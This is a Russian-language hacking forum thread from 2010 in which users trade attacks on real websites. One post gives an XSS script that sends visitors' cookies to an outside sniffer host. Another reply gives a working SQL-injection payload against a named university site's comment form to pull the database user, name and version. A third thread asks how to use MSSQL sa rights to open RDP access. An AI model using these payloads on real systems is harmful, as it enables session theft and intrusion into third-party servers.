05.01.2010, 03:01
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Сообщение от Strilo4ka
Не только куки еще код скриптов можно смотреть, кузя писал!!!
дай ссылку плиз на это чудо
|
|
|
05.01.2010, 06:10
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
<script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
вот код. Почему картинку не показывает и в логе сниффера не появляется запись? Подскажите плиз
|
|
|
|
05.01.2010, 06:25
|
|
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами:
9594385
Репутация:
386
|
|
С ним все нормально, иши ошибки в самой ксс. Малоли что оно там фильтрует =\
|
|
|
|
05.01.2010, 06:51
|
|
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами:
8625696
Репутация:
1
|
|
я отправляю этот файл(это у меня txt файл) открываю его прямо в maile и он открывает только код.
|
|
|
|
05.01.2010, 07:22
|
|
Новичок
Регистрация: 27.02.2007
Сообщений: 8
С нами:
10106889
Репутация:
0
|
|
А чего ты собственно хотел? Это конечно интересно отправлять файл и ждать что он выполнится... Учи матчасть, потом заходи.
|
|
|
|
05.01.2010, 17:22
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
С нами:
9538880
Репутация:
83
|
|
Друзья, как можно использовать ошибку здесь http://disput.mrsu.ru/art/59/?&comact=0
Если ввести там к примеру, кавычку, то выводится нечто подобное:
Во время добавления комментария произошла неизвестная ошибкаINSERT INTO altx_main_comments (com_id, art_id, user_id, com_user, com_ip, com_time, com_text) VALUES ('', '59', '-1', 'ronald', '5b4c118a', '1262697678', ''')
|
|
|
|
05.01.2010, 19:19
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от ronald
Друзья, как можно использовать ошибку здесь http://disput.mrsu.ru/art/59/?&comact=0
Если ввести там к примеру, кавычку, то выводится нечто подобное:
Впиши в поле имя:
name', '1', '1', concat_ws(0x3a,user(),database(),version()))#
И по структуре запроса в поле "com_text" запишется concat_ws(0x3a,user(),database(),version()), тобишь юзер:БД:версия
Последний раз редактировалось mailbrush; 05.01.2010 в 19:21..
|
|
|
|
05.01.2010, 17:26
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
вот интересует вопрос по поводу sql inj, как можно добавит имя польз и пасс на удаленого рабочего стола через реестр. Тоесть как примерно составит запрос к базе данных (MSSQL Server 2000) чтоб в последуюшем открыть доступ к RDP
есть привелегия sa
Последний раз редактировалось YuNi|[c; 05.01.2010 в 17:40..
|
|
|
|
05.01.2010, 17:56
|
|
Участник форума
Регистрация: 27.03.2008
Сообщений: 288
С нами:
9538880
Репутация:
83
|
|
Посмотри, может поможет чем-нибудь:
http://www.xakep.ru/post/50234/
|
|
|
|
06.01.2010, 12:34
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от ronald
Посмотри, может поможет чем-нибудь:
http://www.xakep.ru/post/50234/
спасибо то что надо
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
